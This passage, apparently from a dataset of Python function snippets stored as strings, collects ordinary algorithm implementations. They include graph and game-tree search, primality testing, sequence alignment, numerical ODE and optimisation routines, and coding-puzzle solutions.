node: node.path_cost\n )\n\n return None\n\n def expand(node, problem):\n nonlocal nodes_generated\n nodes = []\n for edge in 
problem.graph.edges(node.name):\n nodes.append(SearchNode(edge.weight, edge.destination, node))\n \n nodes_generated += len(nodes)\n return nodes\n\n initial_problem = Problem(start, end, graph, lambda x: x.name == end)\n result = tree_search(initial_problem, [])\n\n # convert the resulting nested structure into an actual path of (start, end, cost)\n def walk(node):\n pred = node.predecessor\n if pred is None:\n return []\n \n path = walk(pred)\n path.append((pred.name, node.name, node.step_cost))\n return path\n\n path = walk(result) if result is not None else None\n return (path, nodes_expanded, nodes_generated, max_nodes_in_memory)", "def f(x,time):\n ret = []\n for i in xrange(n):\n xd = s[i] - gamma[i]*x[i] + \\\n sum([abs(beta[i,j])*hill(x[j],beta[i,j],theta[0]) \\\n for j in xrange(n)])\n ret.append(xd)\n return ret", "def aks( n ):\n\n def aks_mod( polynomial , r ):\n \"\"\"\n This function is used in aks.\n polynomial modulo ( x^r - 1 )\n \"\"\"\n aks_mod = polynomial.coefficients\n total = aks_mod[ : r ]\n aks_mod = aks_mod[ r : ]\n while len(aks_mod) - 1 >= r :\n for i in range(r):\n total[i] += aks_mod[i]\n aks_mod = aks_mod[ r : ]\n for i in range(len(aks_mod)):\n total[i] += aks_mod[i]\n return array_poly_mod( total , polynomial.mod )\n\n lg = math.log( n , 2 )\n k = int( lg * lg )\n\n if arith1.powerDetection( n )[ 1 ] != 1: #Power Detection\n print(\" n is not prime \")\n return False\n\n start = 3\n while 1:\n d = arith1.gcd.gcd( start , n )\n if 1 < d < n:\n print(\"n is not prime\")\n return False\n x = n % start\n N = x\n for i in range( 1 , k + 1 ):\n if N == 1:\n break\n N = ( N * x ) % start\n if i == k:\n r = start\n break\n start += 1\n d = arith1.gcd.gcd( r , n )\n if 1 < d < n:\n print(\" n is not prime \")\n return False\n if n <= r:\n print(\" n is prime \")\n return True\n\n e = multiplicative.euler( r ) #Cyclotomic Conguence\n e = math.sqrt( e )\n e = int( e * lg )\n for b in range( 1 , e+1 ):\n f = array_poly_mod( [ b , 1 ] , n )\n total = array_poly_mod( [ 1 ] , n )\n count = n\n while count > 0:\n if count & 1:\n total = total * f\n total = aks_mod( total , r )\n f = f.power()\n f = aks_mod( f , r )\n count = count >> 1\n total_poly = total.coefficients_to_dict()\n if total_poly != { 0 : b , n % r : 1 }:\n print(\" n is not prime \")\n return False\n print(\" n is prime \")\n return True", "def beautifulSubsets(self, nums: List[int], k: int) -> int:\n\n \"\"\"\n queue = deque([([], -1)])\n res = 0\n\n while queue:\n cur, idx = queue.popleft()\n res += 1\n\n for i in range(idx + 1, len(nums)):\n if nums[i] - k in cur or nums[i] + k in cur:\n continue\n\n queue.append((cur + [nums[i]], i))\n\n return res - 1\n \"\"\"\n\n \"\"\"\n # dp0 is the ways that without A[i]\n # dp1 is the ways that with A[i]\n\n count = [Counter() for i in range(k)]\n for n in nums:\n count[n % k][n] += 1\n\n res = 1\n for i in range(k):\n prev, dp0, dp1 = 0, 1, 0\n for n in sorted(count[i]):\n v = pow(2, count[i][n])\n if prev + k == n:\n dp0, dp1 = dp0 + dp1, dp0 * (v - 1)\n else:\n dp0, dp1 = dp0 + dp1, (dp0 + dp1) * (v - 1)\n\n prev = n\n\n res *= dp0 + dp1\n\n return res - 1\n \"\"\"\n\n # Count the frequency of A, and then consider all the arithmetic sequence with difference k.\n # Each arithmetic sequence can be solve as a hourse robber problem.\n # We solve the hourse robber by dp.\n # dp(a) return the result for sequence no bigger than a.\n\n # dp(a)[0] is the ways that without a\n # dp(a)[1] is the ways that with a\n\n # dp(a)[0] = dp(a - k)[0] + dp(a - k)[1]\n # dp(a)[1] = 
dp(a - k)[0] * (2 ^ count(a) - 1\n\n count = Counter(nums)\n\n def dp(n):\n dp0, dp1 = dp(n - k) if n - k in count else (1, 0)\n return dp0 + dp1, dp0 * (pow(2, count[n]) - 1)\n\n return functools.reduce(operator.mul, (sum(dp(n)) for n in count if not count[n + k])) - 1", "def MINSTD0(x):\n \n yield from lehmer(x,16807,2**31-1)", "def solution(A, B):\n downstream = []\n survivor = []\n for i in range(0, len(A)):\n print(f'pass {i}')\n if B[i]: # If a fish is swimming downstream place him in that stack\n downstream.append(A[i])\n # print(f'survivor: <--{survivor}, downstream: {downstream}--> {A[i]} is A[{i}] -- Downstream encountered')\n continue\n elif downstream: # If the fish is swiming upstream and there are fish in the downstream \n while downstream:\n if downstream[-1] < A[i]: # This fish is compared to the downstream fish.\n # print(f'survivor: <--{survivor}, downstream: {downstream}--> {A[i]} is A[{i}]')\n downstream.pop()\n else:\n break # When this current fish is eaten by a downstream fish\n else: # All the downstream fish are eaten by the current upstream fish\n survivor.append(A[i])\n # print(f'survivor: <--{survivor}, downstream: {downstream}-->')\n else: # All the downstream fish are eaten\n survivor.append(A[i])\n # print(f'survivor: <--{survivor}, downstream: {downstream}-->')\n\n # print(f'survivor: <--{survivor}, downstream: {downstream}-->') \n return len(survivor+downstream)", "def euler39():\n\tcount = [0] * 1001\n\n\tfor a in range(1, 333):\n\t\tfor b in range(a+1, 500):\n\t\t\tc = (a**2 + b**2) ** 0.5\n\t\t\tp = a + b + int(c)\n\t\t\t\n\t\t\tif int(c) != c: continue\n\t\t\tif p > 1000: break\n\t\t\t\n\t\t\tcount[p] += 1\n\t\t\t\n\treturn count.index(max(count))", "def q4(array):\n a = array[0]\n b = array[5]\n c = array[10]\n d = array[15]\n a1 = roll(a, 00) + roll(b, 00) + roll(b, 12) + roll(c, 12) + roll(d, 28) + roll(a, 28) + roll(b, 28)\n b1 = roll(b, 19) + roll(c, 19) + roll(d, 3) + roll(a, 3) + roll(b, 3) + roll(c, 7) + roll(d, 23) + roll(a,\n 23) + roll(\n b, 23) + roll(a, 15) + roll(b, 15) + roll(b, 27) + roll(c, 27) + roll(d, 11) + roll(a, 11) + roll(b, 11) + roll(\n d, 31) + roll(a, 31) + roll(b, 31)\n c1 = roll(c, 0) + roll(d, 16) + roll(a, 16) + roll(b, 16) + roll(a, 8) + roll(b, 8) + roll(b, 20) + roll(c,\n 20) + roll(\n d, 4) + roll(a, 4) + roll(b, 4) + roll(d, 24) + roll(a, 24) + roll(b, 24)\n d1 = roll(a, 8) + roll(b, 8) + roll(b, 20) + roll(c, 20) + roll(d, 4) + roll(a, 4) + roll(b, 4) + roll(d,\n 24) + roll(a,\n 24) + roll(\n b, 24)\n\n return a1, array[1], array[2], array[3], array[4], b1, array[6], array[7], array[8], array[9], c1, array[11], array[\n 12], array[13], array[14], d1", "def q1(array):\n a = array[3]\n b = array[4]\n c = array[9]\n d = array[14]\n a1 = roll(a, 00) + roll(b, 00) + roll(b, 12) + roll(c, 12) + roll(d, 28) + roll(a, 28) + roll(b, 28)\n b1 = roll(b, 19) + roll(c, 19) + roll(d, 3) + roll(a, 3) + roll(b, 3) + roll(c, 7) + roll(d, 23) + roll(a,\n 23) + roll(\n b, 23) + roll(a, 15) + roll(b, 15) + roll(b, 27) + roll(c, 27) + roll(d, 11) + roll(a, 11) + roll(b, 11) + roll(\n d, 31) + roll(a, 31) + roll(b, 31)\n c1 = roll(c, 0) + roll(d, 16) + roll(a, 16) + roll(b, 16) + roll(a, 8) + roll(b, 8) + roll(b, 20) + roll(c,\n 20) + roll(\n d, 4) + roll(a, 4) + roll(b, 4) + roll(d, 24) + roll(a, 24) + roll(b, 24)\n d1 = roll(a, 8) + roll(b, 8) + roll(b, 20) + roll(c, 20) + roll(d, 4) + roll(a, 4) + roll(b, 4) + roll(d,\n 24) + roll(a,\n 24) + roll(\n b, 24)\n\n return array[0], array[1], array[2], a1, b1, array[5], array[6], array[7], 
array[8], c1, array[10], array[11], \\\n array[\n 12], array[13], d1, array[15]", "def alphabeta_search(state):\r\n \r\n '''\r\n Terminates when game.actions is empty\r\n Class Game needs the following functions:\r\n - game.result(state, a) -- successor\r\n - game.actions(state) -- possible moves\r\n - game.utility -- returns the state of the game (win/lose or tie, when game is terminal)\r\n \r\n '''\r\n #sort state.actions in increasing or decreasing based on max or min (alpha or beta)\r\n #use heuristics fn to get a value for each move (move is in format (x,y) where x and y are ints\r\n \r\n d = depthset[0] #this is the cutoff test depth value. if we exceed this value, stop\r\n cutoff_test=None\r\n sort_fn = [vitalpoint, eyeHeur]\r\n eval_fn = survivalheur \r\n #randnumheuristics \r\n player = state.to_move()\r\n prune = 0\r\n pruned = {} #this will store the depth of the prune\r\n totaldepth = [0]\r\n visited = {}\r\n heuristicInd = 0\r\n \r\n def max_value(state, alpha, beta, depth, heuristicInd):\r\n branches = len(state.actions())\r\n onbranch = 0\r\n \r\n if totaldepth[0] < depth:\r\n totaldepth[0] = depth\r\n if cutoff_test(state, depth):\r\n return eval_fn(state)\r\n v = -infinity\r\n \r\n #sort state.actions based on heuristics before calling\r\n #max wants decreasing\r\n #sorted(state.actions(), key = eval_sort, reverse = True)\r\n \r\n #sort by favorites first, returns a list of actions\r\n # for sorts in sort_fn:\r\n tempher = heuristicInd\r\n\r\n sorts = sort_fn[heuristicInd]\r\n sortedactions, heuristicInd = sorts(state)\r\n #if heuristicInd != tempher:\r\n # print 's',\r\n ''''''\r\n for a in sortedactions:\r\n if visited.get(depth) == None:\r\n visited[depth] = [a]\r\n else:\r\n visited[depth].append(a)\r\n \r\n onbranch += 1\r\n v = max(v, min_value(state.result(a),\r\n alpha, beta, depth+1, heuristicInd)) #+ vitscore.count(a)\r\n if v >= beta: #pruning happens here, but in branches\r\n if pruned.get(depth) == None:\r\n pruned[depth] = branches - onbranch\r\n else:\r\n pruned[depth] += (branches - onbranch)\r\n #print \"prune\", depth, \" \", state.actions()\r\n #state.display()\r\n return v\r\n alpha = max(alpha, v)\r\n \r\n #print depth, \" \", state.actions()\r\n #state.display()\r\n \r\n return v\r\n\r\n def min_value(state, alpha, beta, depth, heuristicInd):\r\n branches = len(state.actions())\r\n onbranch = 0\r\n \r\n if totaldepth[0] < depth:\r\n totaldepth[0] = depth\r\n if cutoff_test(state, depth):\r\n return eval_fn(state)\r\n v = infinity\r\n \r\n #sort state.actions based on heuristics before calling\r\n #min wants increasing\r\n #sorted(state.actions(), key = eval_sort)\r\n #Shayne\r\n tempher = heuristicInd\r\n sorts = sort_fn[heuristicInd]\r\n sortedactions, heuristicInd = sorts(state, 1)\r\n #if heuristicInd != tempher:\r\n # print 's',\r\n for a in sortedactions: #state.actions():\r\n onbranch += 1\r\n if visited.get(depth) == None:\r\n visited[depth] = [a]\r\n else:\r\n visited[depth].append(a)\r\n v = min(v, max_value(state.result(a),\r\n alpha, beta, depth+1, heuristicInd))\r\n if v <= alpha: #pruning happens here, but in branches\r\n if pruned.get(depth) == None:\r\n pruned[depth] = branches - onbranch\r\n else:\r\n pruned[depth] += (branches - onbranch)\r\n #print \"prune\", depth, \" \", state.actions()\r\n #state.display()\r\n return v\r\n beta = min(beta, v)\r\n #print depth, \" \", state.actions()\r\n #state.display()\r\n return v\r\n\r\n # Body of alphabeta_search starts here:\r\n #def cutoff_test and eval_fn \r\n cutoff_test = (cutoff_test 
or\r\n (lambda state,depth: depth>d or state.terminal_test()))\r\n eval_fn = eval_fn or (lambda state: state.utility(player))\r\n #by default, utility score is used\r\n \r\n \r\n #argmax goes through all the possible actions and \r\n # applies the alphabeta search onto all of them\r\n # and returns the move with the best score \r\n #print state.actions()\r\n heuristicInd = 0\r\n sorts = sort_fn[heuristicInd]\r\n sortedact, heuristicInd = sorts(state)\r\n abmove = argmax(sortedact,\r\n lambda a: min_value(state.result(a),\r\n -infinity, infinity, 0, heuristicInd))\r\n\r\n print 'problem,', problemno[0], ', total tree depth,', totaldepth[0]\r\n for i in range(1, len(visited)):\r\n if len(pruned) < i:\r\n pruned[i] = 0\r\n print i, \",\", len(visited[i]), \",\", pruned[i]\r\n \r\n return abmove", "def _hs_reducible_stages(self,tol=1.e-13):\n m=len(self)\n mindiff=10.\n for i in range(m):\n for j in range(i+1,m):\n dif = np.max(np.abs(self.A[i,:]-self.A[j,:]))\n if dif<tol: return True,[i,j]\n mindiff=min(mindiff,dif)\n return False, mindiff", "def hwt(data):\n sz = len(data)\n i = 0\n res1 = []\n res2 = []\n while i < sz:\n s0 = data[i]\n s1 = data[i+1]\n res1.append((s0+s1)/2.)\n res2.append((s0-s1)/2.)\n i += 2\n return (res1,res2)", "def mbieLoop (self) :\n self.iterCnt = 0\n while self.iterCnt < 5000:\n s = self.mdp.s0\n for h in range(self.H) :\n self.QUpper = QBoundsSolver(self.mdp, self.PHat, self.QUpper, self.Ntotal, 0.1, True, self.stop)\n a = np.argmax(self.QUpper[s])\n s_, self.R[s,a] = self.mdp.step(s, a)\n self.updateVisitStatistics(s, a, s_)\n s = s_\n\n if self.iterCnt % 10 == 0: \n print(self.iterCnt)\n print(self.QUpper)\n\n self.iterCnt += 1", "def needleman_wunsch1(x,y,lodict=None,gop=-2.5, gep=-1.75, local=False):\n n,m = len(x),len(y)\n dp = np.zeros((n+1,m+1))\n pointers = np.zeros((n+1,m+1),np.int32)\n for i in range(1,n+1):\n dp[i,0] = dp[i-1,0]+(gep if i>1 else gop)\n pointers[i,0]=1\n for j in range(1,m+1):\n dp[0,j] = dp[0,j-1]+(gep if j>1 else gop)\n pointers[0,j]=2\n for i in range(1,n+1):\n for j in range(1,m+1):\n if not lodict:\n if x[i-1] == y[j-1]:\n match = dp[i-1,j-1]+1\n else:\n match = dp[i-1,j-1]-1\n else:\n match = dp[i-1,j-1]+lodict[x[i-1],y[j-1]]\n insert = dp[i-1,j]+(gep if pointers[i-1,j]==1 else gop)\n delet = dp[i,j-1]+(gep if pointers[i,j-1]==2 else gop)\n max_score = max([match,insert,delet])\n dp[i,j] = max_score\n pointers[i,j] = [match,insert,delet].index(max_score)\n alg = []\n i,j = n,m\n while(i>0 or j>0):\n pt = pointers[i,j]\n if pt==0:\n i-=1\n j-=1\n alg = [[x[i],y[j]]]+alg\n if pt==1:\n i-=1\n alg = [[x[i],'-']]+alg\n if pt==2:\n j-=1\n alg = [['-',y[j]]]+alg\n return dp[-1,-1], alg", "def entropy(self):\n\n \"\"\"Gets the first neighbours, which are the first 2*r+1 cells.\"\"\"\n current_neighbours = []\n amount = [0] * self.k ** (2 * self.r + 1)\n for i in range(2 * self.r + 1):\n current_neighbours.append(self.config[self.t, i % self.width])\n\n \"\"\"Calculates the rule and adds one to it's amount. 
It then removes the\n leftmost cell and adds a cell to the right.\"\"\"\n for i in range(len(self.config[self.t]) - 1):\n rule = 0\n for j in range(len(current_neighbours)):\n rule += int(current_neighbours[j] *\n self.k ** ((2 * self.r + 1) - j - 1))\n amount[len(amount) - 1 - rule] += 1\n current_neighbours.pop(0)\n current_neighbours.append(\n self.config[self.t, (2 * self.r + 1 + i) % self.width])\n\n \"\"\"Calculates the rule for the last neighbourhood.\"\"\"\n rule = 0\n for j in range(len(current_neighbours)):\n rule += int(current_neighbours[j] *\n self.k ** ((2 * self.r + 1) - j - 1))\n amount[len(amount)-1 - rule] += 1\n\n \"\"\"Calculates the Shannon entropy and the the average entropy so far.\"\"\"\n shannon = 0\n for i in range(len(amount)):\n if(amount[i] != 0):\n probability = amount[i] / self.width\n shannon -= probability * np.log2(probability)\n self.average_entropy = (self.average_entropy *\n self.t + shannon) / (self.t + 1)", "def Titer(infectedwells, volume, dilution):\n rows = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H'] # row labels in order\n reverserows = [row for row in rows]\n reverserows.reverse()\n nreplicates = len(infectedwells)\n if nreplicates < 2:\n raise ValueError(\"This implementation of the Reed-Muench formula requires at least two replicates. Only %d are provided.\" % nreplicates)\n counts = dict([(r, 0) for r in rows]) # counts of infected wells at each dilution\n for replicatewells in infectedwells:\n for well in replicatewells:\n if well not in rows:\n raise ValueError(\"One of the rows is specified as %s, which is not a valid row.\" % well)\n counts[well] += 1\n infected = {} # cumulative totals of infected wells going up plate\n uninfected = {} # cumulative totals of uninfected wells going down plate\n n = 0\n for row in rows:\n uninfected[row] = n + nreplicates - counts[row]\n n = uninfected[row]\n n = 0\n for row in reverserows:\n infected[row] = n + counts[row]\n n = infected[row]\n percentinfected = {} # cumulative percent infected\n for row in rows:\n percentinfected[row] = 100.0 * infected[row] / (infected[row] + uninfected[row])\n for irow in range(len(rows)):\n if percentinfected[rows[irow]] < 50:\n if irow == 0:\n raise ValueError(\"Even the first dilution has < 50% infected.\")\n else:\n rowabove50 = rows[irow - 1]\n break\n else:\n raise ValueError(\"No dilutions have < 50% infected.\")\n percentrowabove50 = percentinfected[rowabove50]\n if rowabove50 != rows[-1]:\n percentrowbelow50 = percentinfected[rows[rows.index(rowabove50) + 1]]\n else:\n percentrowbelow50 = 0\n index = (percentrowabove50 - 50.0) / (percentrowabove50 - percentrowbelow50)\n startdilution = rows.index(rowabove50)\n titer = dilution**(startdilution + index) / volume\n return titer", "def hillClimbingSearch_FC(problem, maxTrials, userInteraction, beQuiet):\n\n\n currentState = problem.state\n if not beQuiet:\n problem.visualize(currentState)\n steps = 0\n\n # for visualization\n problem.hVals.append(problem.getObjValue(currentState))\n \n while True:\n currentObjVal = problem.getObjValue(currentState)\n if problem.isGlobalOptimum(currentState):\n return steps, currentState\n trials = 0\n betterState = None\n while trials < maxTrials:\n neighbour = problem.getRandomNeighbour(currentState)\n nObjVal = problem.getObjValue(neighbour)\n if problem.isBetter(nObjVal, currentObjVal):\n betterState = neighbour\n break\n trials+=1\n if betterState: \n # jump to neighbour better than current state\n currentState = betterState\n \n # for visualization later on\n 
problem.hVals.append(problem.getObjValue(currentState))\n \n steps+=1\n if not beQuiet:\n if userInteraction:\n input(\"Press enter to continue \")\n problem.visualize(currentState)\n else:\n print(f\"{maxTrials} trials for random neighbours exhausted. No better neighbour found.\")\n return steps, currentState", "def advance(self):\n\n f, n, rtol, atol, neq = \\\n self.f, self.n, self.rtol, self.atol, self.neq\n u_n, t_n, t_next = self.u[n], self.t[n], self.t[n+1]\n dt = t_next - t_n\n\n first_step = dt # try one big step to next desired level\n\n def middle(x,y,z): # Auxilary function\n return sorted([x,y,z])[1]\n\n # Extract coefficients from Butcher-tableau\n table = self._butcher_tableau\n k_len = table.shape[1] - 1 # number of internal stages\n\n # coefficients for internal stages\n factors_u = np.asarray(table[:k_len, 1:])\n # coefficients for t\n factors_t = table[:k_len, 0]\n # coefficients for u_new\n factors_u_new = table[k_len, 1:]\n\n # coefficients for local error between 2 levels\n factors_error = table[k_len+1, 1:] - factors_u_new\n\n u_intermediate = [u_n,]\n t_intermediate = [t_n,]\n u, t, h = u_n, t_n, first_step # initial values\n k = np.zeros((k_len, self.neq), self.dtype) # intern stages\n\n if self.verbose > 0:\n print 'advance solution in [%s, %s], h=%g' % (t_n, t_next, h)\n\n # Loop until next time point is reached\n while (abs(t - t_n) < abs(t_next - t_n)):\n u, t = u_intermediate[-1], t_intermediate[-1]\n\n # Internal steps\n k[:, :] = 0. # initialization for next step\n for m in range(k_len):\n k_factors = (np.dot(factors_u, k))[m]\n #print u, u+h*k_factors, f(u+h*k_factor, 0.5), self.dtype\n k[m] = f(u+h*k_factors, t+h*factors_t[m])\n u_new = u + h*(np.dot(factors_u_new, k))\n\n self.info['rejected'] += 1 # reduced below if accepted\n if self.verbose > 0:\n print ' u(t=%g)=%g: ' % (t+h, u_new),\n\n # local error between 2 levels\n error = h*np.abs(np.dot(factors_error, k))\n # Acceptable error tolerance\n tol = rtol*np.abs(u_new) + atol\n\n accurate = (error <= tol).all()\n\n if accurate or h <= self.min_step or h >= self.max_step:\n # Accurate enough,\n # or the step size exceeds valid range,\n # must accept this solution\n u_intermediate.append(u_new)\n t_intermediate.append(t+h)\n if not self.disk_storage:\n self.u_all.append(u_new)\n self.t_all.append(t+h)\n self.info['rejected'] -= 1\n\n if self.verbose > 0:\n print 'accepted, ',\n else:\n if self.verbose > 0:\n print 'rejected, ',\n\n if self.verbose > 0:\n print 'err=%s, ' % str(error),\n if hasattr(self, 'u_exact') and callable(self.u_exact):\n print 'exact-err=%s, ' % \\\n (np.asarray(self.u_exact(t+h))-u_new),\n if h <= self.min_step:\n print 'h=min_step!! ',\n\n\n # Replace 0 values by 1e-16 since we will divide by error\n error = np.asarray([(1e-16 if x == 0. 
else x) \\\n for x in error])\n\n # Normarized error rate\n rms = error/tol\n rms_norm = np.sqrt(np.sum(rms*rms)/self.neq)\n\n order = float(self._method_order[0])\n # factor to adjust the size of next step\n # Formula is from <Numerical Methods for Engineers,\n # Chappra & Cannle>\n s = .8 *((1./rms_norm)**(1/order))\n # scalar should be in range(0.1, 4.)\n # for better accuracy and smoothness\n s = middle(s, 0.1, 4.0)\n h *= s\n\n # step size should be in range [min_step, max_step]\n h = middle(h, self.min_step, self.max_step)\n # adjust h to fit the last step\n h = min(h, t_next - t_intermediate[-1])\n\n if self.verbose > 0:\n print 'new h=%g' % h\n\n if h == 0:\n break\n\n return u_new", "def ftlan_E1c(hop, v0, T, m=50, Min_b=10e-10, Min_m=5, kB=1, norm = np.linalg.norm):\n# def Tri_diag(a1, b1):\n# mat = np.diag(b1, -1) + np.diag(a1, 0) + np.diag(b1, 1)\n# e, w = np.linalg.eigh(mat)\n# return e, w\n\n beta = 1./(T * kB)\n E = 0.\n a, b = [], []\n v0 = v0/norm(v0)\n Hv = hop(v0)\n a.append(v0.dot(Hv))\n v1 = Hv - a[0] * v0\n b.append(norm(v1))\n if b[0] < Min_b:\n return 0\n\n v1 = v1/b[0]\n Hv = hop(v1)\n a.append(v1.dot(Hv))\n\n for i in range(1, m - 1):\n v2 = Hv - b[i - 1] * v0 - a[i] * v1\n b.append(norm(v2))\n if abs(b[i]) < Min_b:\n b.pop()\n break\n\n v2 = v2/b[i]\n Hv = hop(v2)\n a.append(v2.dot(Hv))\n v0 = v1.copy()\n v1 = v2.copy()\n \n a = np.asarray(a)\n b = np.asarray(b)\n\n eps, phi = Tri_diag(a, b)\n l = len(eps)\n# Eo = eps[0]\n# eps = eps-Eo\n exp_eps = np.exp(-beta * eps)\n E = np.sum(exp_eps * eps * phi[0, :]**2.)\n Z = np.sum(exp_eps * phi[0, :]**2.)\n# for i in range(len(eps)):\n# E += exp_eps[i] * eps[i] * phi[0, i]**2\n\n# E = E + Eo\n# de = eps[:, np.newaxis] - eps\n# for i in range(l):\n# E += eps[i] * phi[0, i]**2./np.sum(np.exp(-beta*de[:l, i])*(phi[0, :l]**2.))\n return E, Z", "def gem_solve(A, b):\r\n\tstart = time()\r\n\tn = len(A)\r\n\tU = [[0.0 for k in range(n)] for k in range(n)]\r\n\tfor k in range(n):\r\n\t\tfor i in range(k+1,n):\r\n\t\t\tA[i][k] = A[i][k]/A[k][k]\r\n\t\t\tb[i] = b[i] - A[i][k]*b[k]\r\n\t\tfor j in range(k+1,n):\r\n\t\t\tfor i in range(k+1, n):\r\n\t\t\t\tA[i][j] = A[i][j]-A[i][k]*A[k][j]\r\n\t\t\t\t\r\n\tfor i in range(n):\r\n\t\tfor j in range(n):\r\n\t\t\tif i>j:\r\n\t\t\t\tU[i][j] = 0\r\n\t\t\telse:\r\n\t\t\t\tU[i][j] = A[i][j]\r\n\t\r\n\tx, place = backward(U, b)\r\n\tend = time()\r\n\treturn x, (end-start)", "def breath_analyze(self, offset=0, th=10):\n # breath part\n breath_gd = np.gradient(gf(self.breath_list, 10))\n breath_gd[breath_gd > 0] = 1\n breath_gd[breath_gd < 0] = 0\n breath_pulse = breath_gd[:-1]-np.roll(breath_gd, -1)[:-1]\n breath_in = argrelextrema(breath_pulse, np.less, order=10)[0]#+offset\n breath_out = argrelextrema(breath_pulse, np.greater, order=10)[0]#+offset\n self.breath = np.sort(np.hstack([breath_in, breath_out, len(self.breath_list)-1]))\n \n if self.breath[0] == breath_in[0]:\n self.btype = 'in'\n else:\n self.btype = 'out' \n\n b_in = []\n b_out = []\n delidx = []\n\n if len(self.breath) != 0: \n for i, j in zip(self.breath[:-1], self.breath[1:]):\n breath_diff = abs(self.breath_list[j]-self.breath_list[i])\n if abs(breath_diff) > 3000: # really breath in/out\n if abs(breath_diff) < 30000: # not deep breath\n if breath_diff > 0: # breath out\n print('breath out from frame '+str(i)+' to frame '+str(j)\n +' <== breath not deep enough')\n b_out.append(j-i)\n self.ngframe.append(i)\n else: # breath in\n print('breath in from frame '+str(i)+' to frame '+str(j)\n +' <== breath not deep enough')\n 
b_in.append(j-i)\n else: \n if breath_diff > 0: # breath out\n print('breath out from frame '+str(i)+' to frame '+str(j))\n b_out.append(j-i)\n else: # breath in\n print('breath in from frame '+str(i)+' to frame '+str(j))\n b_in.append(j-i)\n else:\n delidx.append(np.argwhere(self.breath==j)[0][0])\n self.breath = np.delete(self.breath, np.array(delidx))\n\n print('\\naverage breath out freq is: '+str(np.round(30./np.mean(b_out), 2))+' Hz')\n print('\\naverage breath in freq is: '+str(np.round(30./np.mean(b_in), 2))+' Hz')\n else:\n raise ImportError('Doing too fast !! please redo again !!')", "def calc_heuristic(self, state):\n h = 0\n board = state.board.array\n\n for i in range(self._n):\n for j in range(self._n):\n\n if board[i][j] != space_rep:\n tile_as_number = board[i][j]\n correct_x = (tile_as_number - 1) // self._n\n correct_y = (tile_as_number - 1) % self._n\n else:\n continue\n h += calc_diffs(i, j, correct_x, correct_y)\n return h", "def hill_climbing(problem):\n\n current = State(problem.initial_state)\n print(current.get_value())\n while current.get_value() != 0:\n neighbour = current.generate_neighbour()\n print(neighbour.board)\n print(neighbour.get_value())\n if neighbour.get_value() >= current.get_value():\n return current.board\n current = neighbour", "def uniformCostSearch(problem):\n \"*** YOUR CODE HERE ***\"\n path_to_point = {}\n cost_to_point = {}\n\n # Get the start node\n start_node = problem.getStartState()\n fringe_node = [start_node]\n path_to_point[start_node] = []\n cost_to_point[start_node] = problem.getCostOfActions(path_to_point[start_node])\n\n goal_found = False\n\n while(not goal_found):\n #for i in range(100): \n nodes_to_expand = set()\n # get max value node in the fringe node\n min_val = float(\"inf\")\n for one_node in fringe_node:\n # Compute the cost to reach a node\n if cost_to_point[one_node] < min_val:\n min_val = cost_to_point[one_node]\n \n for one_node in fringe_node:\n # Compute the cost to reach a node\n if cost_to_point[one_node] == min_val:\n nodes_to_expand.add(one_node)\n fringe_node.remove(one_node)\n\n # Expand the fringe node \n for one_node in nodes_to_expand:\n path_to_parent = path_to_point[one_node]\n for nxt_node in problem.getSuccessors(one_node):\n pos = nxt_node[0]\n mv = nxt_node[1]\n # check if point already present in path to point\n prev_cost = float(\"inf\")\n if pos in cost_to_point:\n prev_cost = cost_to_point[pos]\n new_path = path_to_parent + [mv]\n if prev_cost > problem.getCostOfActions(new_path):\n path_to_point[pos] = new_path\n cost_to_point[pos] = problem.getCostOfActions(new_path)\n fringe_node.append(pos)\n\n # Check if destination is reached in the fringe node\n for one_node in fringe_node:\n if problem.isGoalState(one_node):\n final_node = one_node\n goal_found = True\n break\n \n #print(len(fringe_node))\n print(final_node)\n print(path_to_point[final_node])\n return path_to_point[final_node] \n\n util.raiseNotDefined()", "def brute_force(L):\n\n max_diff = -float(\"inf\")\n length = len(L)\n for i in range(length - 1):\n start = L[i]\n for j in range(i + 1, length):\n end = L[j]\n diff = end - start\n max_diff = max(max_diff, diff)\n return max_diff", "def solveProblem048():\n # Trivial to brute force with modern hardware.\n sd = 0\n for i in range(1,1000+1):\n sd += i**i\n s = str(sd)\n s = s[-10:]\n print(s)", "def fn(lo, hi):\n if lo == hi: return piles[lo]\n return max(piles[lo] - fn(lo+1, hi), piles[hi] - fn(lo, hi-1))", "def bfgs_method(x0, eps=1e-6, H0=np.eye(18),c1=1e-4):\n k = 0 # initialize 
num of outer iterations.\n inner_k = 0 # initialize inner k iteration.\n old_xk = None\n alpha_original = 1\n alpha = np.copy(alpha_original)\n xk = x0 # intitialize x.\n Hk = H0 # initialize H, positive definite matrix.\n I = np.eye(len(x0)) # idenitity matrix of 2 by 2.\n\n alpha_vec = []\n f_vec = []\n grad_vec = []\n inner_k = []\n conv_c = []\n\n while np.linalg.norm(rosen_der(xk)) > eps:\n pk = -Hk @ rosen_der(xk)\n\n xk_next = xk + alpha * pk\n ink = 0\n print(xk)\n while rosen(xk_next) > rosen(xk) + c1 * alpha * (pk.T @ rosen_der(xk)):\n \"\"\" find a step size that will satisfy Armijo-Goldstein inequality. Modify alpha. \"\"\"\n alpha = 0.1* alpha\n xk_next = xk + alpha * pk\n ink += 1\n\n inner_k.append(abs(int(ink)))\n\n xk_next = xk + alpha * pk\n\n sk = xk_next - xk\n\n yk = rosen_der(xk_next) - rosen_der(xk)\n\n rho = 1 / (yk.T @ sk)\n\n Hk = np.copy((I - rho * sk @ yk.T) @ Hk @ (I - rho * yk @ sk.T) + rho * sk @ sk.T)\n\n old_xk = np.copy(xk)\n xk = np.copy(xk_next)\n\n alpha_vec.append(alpha)\n f_vec.append(rosen(xk))\n grad_vec.append(np.linalg.norm(rosen_der(xk)))\n alpha = np.copy(alpha_original)\n print(f_vec[-1])\n\n k += 1\n\n return xk, k, inner_k, alpha_vec, f_vec, grad_vec", "def drecurrance(cache, a, b, i, j):\n if i == j and j == 0:\n cache[i][j] = 0\n elif i == 0:\n cache[i][j] = j\n elif j == 0:\n cache[i][j] = i\n elif a[i-1] == b[j-1]:\n cache[i][j] = cache[i-1][j-1]\n else:\n cache[i][j] = 1 + min(cache[i-1][j], cache[i][j-1], cache[i-1][j-1])", "def dfs(x, p, step):\n disc[x] = low[x] = step\n for xx in graph.get(x, []): \n if disc[xx] == inf: \n step += 1\n dfs(xx, x, step)\n low[x] = min(low[x], low[xx])\n if low[xx] > disc[x]: ans.append([x, xx]) # bridge\n elif xx != p: low[x] = min(low[x], disc[xx])", "def safeJourney(Alist,s,d):\n #Initialize dictionaries\n dinit = 10**6\n Edict = {} #Explored nodes\n Udict = {} #Unexplored nodes\n path 